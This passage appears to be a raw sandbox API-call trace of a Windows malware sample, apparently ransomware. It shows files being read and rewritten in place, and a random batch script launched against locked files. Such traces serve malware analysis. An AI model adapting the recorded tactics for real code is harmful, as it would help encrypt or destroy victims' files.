lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x780, lpOverlapped=0x0) returned 1 [0178.514] CloseHandle (hObject=0x1d8) returned 1 [0178.514] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x485 [0178.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.514] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.514] ReleaseMutex (hMutex=0x168) returned 1 [0178.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mozilla Firefox.lnk", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0178.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mozilla Firefox.lnk", cchWideChar=19, lpMultiByteStr=0x1f88bcc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mozilla Firefox.lnk", lpUsedDefaultChar=0x0) returned 19 [0178.515] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840e48, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2840e48*, lpNumberOfBytesRead=0x359f2bc*=0x485, lpOverlapped=0x0) returned 1 [0178.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.516] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa0d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0xa0d, lpOverlapped=0x0) returned 1 [0178.516] CloseHandle (hObject=0x1d8) returned 1 [0178.516] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.518] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.518] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8064f1 [0178.518] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.518] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.518] ReleaseMutex (hMutex=0x168) returned 1 [0178.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kalimba.mp3", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kalimba.mp3", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kalimba.mp3", lpUsedDefaultChar=0x0) returned 11 [0178.518] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.521] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.522] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.525] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.526] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.528] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.529] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef20000 [0178.539] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.539] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.539] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eea0000 [0178.550] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.555] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0179.571] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0179.571] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ef20000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0179.571] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef20000 [0179.572] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef20000 [0179.574] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8044f1 [0179.574] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0179.583] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8044f1 [0179.632] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee10000 [0180.142] VirtualQuery (in: lpAddress=0x7eea0000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7eea0000, AllocationBase=0x7eea0000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.142] VirtualFree (lpAddress=0x7eea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.146] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7ef20000, AllocationBase=0x7ef20000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.146] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.147] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0180.147] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0180.147] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.148] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.149] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.149] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.149] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.151] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.151] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.151] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.152] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d0baf8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0180.152] VirtualFree (lpAddress=0x7ee10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.156] CloseHandle (hObject=0x1d8) returned 1 [0180.156] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.157] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0180.157] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x17c [0180.157] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0180.157] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.157] ReleaseMutex (hMutex=0x168) returned 1 [0180.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.158] ReadFile (in: hFile=0x1d8, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x17c, lpOverlapped=0x0) returned 1 [0180.159] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0180.159] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x704, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x359f2d0*=0x704, lpOverlapped=0x0) returned 1 [0180.159] CloseHandle (hObject=0x1d8) returned 1 [0180.159] GetCurrentThreadId () returned 0x96c [0180.159] GetCurrentThreadId () returned 0x96c [0180.160] GetCurrentThreadId () returned 0x96c [0180.160] SetEvent (hEvent=0xc4) returned 1 [0180.160] RtlExitUserThread (Status=0x0) Thread: id = 22 os_tid = 0x97c [0062.827] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", dwFileAttributes=0x80) returned 1 [0062.828] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessInformation=0x36df864*(hProcess=0x1f8, hThread=0x1f0, dwProcessId=0x9bc, dwThreadId=0x9cc)) returned 1 [0062.977] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x1388) returned 0x102 [0070.701] CloseHandle (hObject=0x1f8) returned 1 [0070.701] CloseHandle (hObject=0x1f0) returned 1 [0070.701] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.701] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x36df648*="RacWmiDatabase.sdf") returned 0x41 [0070.701] GetLastError () returned 0x20 [0070.701] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="洠iͭ폈Hͭ퐔Hͭ") returned 0x51 [0070.702] LocalFree (hMem=0x696d20) returned 0x0 [0070.702] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0070.702] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0070.703] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0070.703] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0070.703] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", dwFileAttributes=0x80) returned 1 [0070.704] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessInformation=0x36df864*(hProcess=0x1f8, hThread=0x1f0, dwProcessId=0x1c4, dwThreadId=0xb30)) returned 1 [0070.711] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x1388) returned 0x102 [0078.733] CloseHandle (hObject=0x1f8) returned 1 [0078.733] CloseHandle (hObject=0x1f0) returned 1 [0078.733] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.733] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x36df648*="RacDatabase.sdf") returned 0x3a [0078.733] GetLastError () returned 0x20 [0078.733] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀iͭ폈Hͭ퐔Hͭ") returned 0x51 [0078.733] LocalFree (hMem=0x696d00) returned 0x0 [0078.733] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0078.734] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0078.742] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0078.742] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0078.742] Sleep (dwMilliseconds=0x5dc) [0081.881] SetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\absolutetelnet.exe", dwFileAttributes=0x80) returned 1 [0081.883] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\absolutetelnet.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\absolutetelnet.exe\"", lpProcessInformation=0x36df864*(hProcess=0x1dc, hThread=0x1e8, dwProcessId=0x6c8, dwThreadId=0xab0)) returned 1 [0081.891] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1388) returned 0x102 [0087.436] CloseHandle (hObject=0x1dc) returned 1 [0087.436] CloseHandle (hObject=0x1e8) returned 1 [0087.436] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\absolutetelnet.exe" (normalized: "c:\\program files\\msbuild\\absolutetelnet.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\absolutetelnet.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\MSBuild\\absolutetelnet.exe", lpFilePart=0x36df648*="absolutetelnet.exe") returned 0x2b [0087.437] GetLastError () returned 0x20 [0087.437] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="泸iͭ폈Hͭ퐔Hͭ") returned 0x51 [0087.437] LocalFree (hMem=0x696cf8) returned 0x0 [0087.437] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0087.437] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0087.437] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0087.438] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0087.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", dwFileAttributes=0x80) returned 0 [0087.438] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"", lpProcessInformation=0x36df864*(hProcess=0x1dc, hThread=0x1e8, dwProcessId=0x9e0, dwThreadId=0x5a8)) returned 1 [0087.446] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1388) returned 0x102 [0099.485] CloseHandle (hObject=0x1dc) returned 1 [0099.486] CloseHandle (hObject=0x1e8) returned 1 [0099.488] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwdui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", lpFilePart=0x36df648*="jnwdui.dll.mui") returned 0x35 [0099.488] GetLastError () returned 0x5 [0099.488] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0099.488] LocalFree (hMem=0x69e2b0) returned 0x0 [0099.488] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0099.488] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0099.489] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0099.489] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0099.489] SetFileAttributesW (lpFileName="C:\\Program 